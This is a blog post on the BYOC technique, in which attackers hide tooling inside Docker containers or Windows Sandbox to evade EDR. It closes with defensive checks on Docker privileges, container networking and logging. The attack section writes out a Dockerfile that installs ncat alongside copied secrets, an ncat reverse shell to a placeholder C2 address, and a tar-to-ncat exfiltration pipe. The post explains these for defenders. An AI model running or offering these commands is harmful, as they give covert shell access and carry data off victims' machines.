DEV Community

KABUKI
KABUKI

Posted on

Your Docker Is Someone Else's Hideout — The EDR Bypass Technique No One Talks About

TL;DR

  • A technique called BYOC (Bring Your Own Container) uses Docker to completely bypass EDR detection
  • The "isolation" feature built for security becomes the attacker's perfect hiding spot
  • North Korea-linked group "TraderTraitor" already used this in real attacks against macOS
  • Windows Sandbox has the same problem — same concept, different tool
  • Docker's trustworthiness is exactly what makes it dangerous

Background: Why Docker Became an Attacker's Best Friend

Docker is everywhere. It's the tool developers trust, use daily, and
rarely question. That trust is precisely the problem.

EDR (Endpoint Detection and Response) tools work by flagging suspicious
processes. But a docker run command? That's just a developer doing
their job. EDR can't easily tell the difference between legitimate
container work and an attacker hiding inside one.

This is BYOC — Bring Your Own Container — a technique presented
at AVTOKYO2024 by Taiichi Kotake of Stella Security. It takes the
"Living off the Land" (LotL) philosophy — abusing trusted, pre-installed
tools — and applies it to Docker.

The result: a fully functional attack environment that EDR doesn't see.

How the Attack Works: 2 Steps, Clean Execution

BYOC breaks down into two phases: getting data in and
getting data out.

Phase 1: Smuggling Data Into the Container

Method A: Mount the Host Directory

# Mount the host desktop directly into the container
$ docker run --rm -v ~/Desktop:/lib/modules -it ubuntu /bin/bash
Enter fullscreen mode Exit fullscreen mode

The --rm flag auto-deletes the container on exit.
Traces on the host? Minimal.

Method B: Bake Data Into a Docker Image

FROM ubuntu:latest
COPY ./secret /lib/modules/
RUN apt update && apt install -y ncat
CMD ["/bin/bash"]
Enter fullscreen mode Exit fullscreen mode

Package the sensitive data into the image itself.
Carry it anywhere Docker is installed.

Method C: Sideload Into a Running Container

# Copy files into an already-running legitimate container
$ docker cp secret.txt <container_id>:/lib/modules/
Enter fullscreen mode Exit fullscreen mode

No new container launch. No unusual process activity.
The stealthiest option of the three.

Phase 2: Exfiltrating Data Out

Method A: Reverse Shell

# Establish a reverse shell from inside the container to C2
ncat XX.XX.XX.XX 3333 -e /bin/bash
Enter fullscreen mode Exit fullscreen mode

Once the shell is open, the attacker operates entirely outside
EDR's view — interactively, freely.

Method B: Direct Data Streaming

# Archive and stream data straight to the C2 server
tar cf - /lib/modules/ | ncat XX.XX.XX.XX 3333
Enter fullscreen mode Exit fullscreen mode

No interactive session needed. Fast, efficient, hard to catch.

Why Attackers Love This: 4 Key Advantages

Advantage Detail
EDR-free shell No dramatic EDR disabling needed — just blend into normal docker usage
Instant attack environment Pre-built image deploys anywhere Docker exists. No tool downloads needed
Persistence & lateral movement Long-running containers become network footholds for scanning internal hosts
Easy cleanup Delete the image, wipe shell history — evidence almost gone

It's Not Just Theory: Real Attacks Already Use This

Elastic Security Labs reported that "TraderTraitor" — a
North Korea-linked threat actor — weaponized Docker in real macOS
attacks.

The attack delivered a malicious Python app disguised as a stock
trading tool, packaged inside a Docker container.

Apple's Endpoint Security Framework (ESF) has limited visibility
into container internals. EDR could detect that a "trusted Docker
process" was accessing SSH keys and AWS credentials — but couldn't
determine whether it was a developer or an attacker.

The container was the perfect disguise.

Docker Isn't Alone: Windows Sandbox Has the Same Problem

The same concept applies to Windows Sandbox — a lightweight, isolated
temporary desktop environment built into Windows.

Like Docker containers, processes inside Windows Sandbox are hidden
from the host's EDR. Attackers can execute malicious code, download
payloads, and prep their attack — then close the Sandbox and
erase every trace instantly.

Different tool, identical logic:
use legitimate isolation technology to create a surveillance-free zone.

The Evolution of EDR Bypass Techniques

Era Technique Core Idea
Early 2020s Malware obfuscation & signature bypass Hide malicious files
Mid 2020s BYOI (Bring Your Own Installer) Abuse legitimate installers
Now BYOC (Bring Your Own Container) Hide inside trusted dev tools

The trend is clear: attackers have moved from
"sneak in a malicious file" to
"hide inside something you already trust."

A Hardware Engineer's Perspective

As a semiconductor engineer, containerized development environments
are increasingly common in my world too — simulation tools, EDA
software, verification pipelines running in Docker.

Reading this article made me ask some uncomfortable questions about
my own environment:

  • Who actually has Docker permissions? High privileges are required to install Docker, but in practice, do we know exactly who can run containers on production-adjacent machines?
  • What networks can containers reach? If a container can talk to the manufacturing control network, a compromised container becomes a launchpad for lateral movement across critical systems
  • Are we logging container activity? The --rm flag is standard practice for clean dev workflows — but it's also ideal for attackers. Do we have any retention policy for container execution logs?

The assumption that "Docker = developer tool = safe" is exactly the
gap attackers are exploiting. In environments where OT and IT
boundaries are already blurring, BYOC is not a distant threat.

Takeaways & Next Actions

Bottom line: The more trusted the tool, the better the hiding spot.
Docker is trusted by everyone — including attackers.

Here's what to check right now:

  1. Audit who has Docker execution privileges — apply least-privilege principles strictly
  2. Review container network settings — restrict unnecessary external communication
  3. Preserve container launch logs — even if --rm deletes the container, logging infrastructure should retain the record
  4. Ask your EDR vendor about container visibility — does your current EDR have insight into processes running inside containers?

Security technology built to protect becomes the attacker's shelter.
The engineers who understand that irony are the ones who can actually
defend against it.

Sources:

  • Think IT — "EDR Bypass via Docker: Bring Your Own Container" (March 13, 2026)
  • Elastic Security Labs — "Bit ByBit: Emulation of the DPRK's Largest Cryptocurrency Heist"
  • Itochu CI Systems — "Hack The Sandbox: Uncovering the Truth Behind Vanished Traces" (March 12, 2025)

Top comments (0)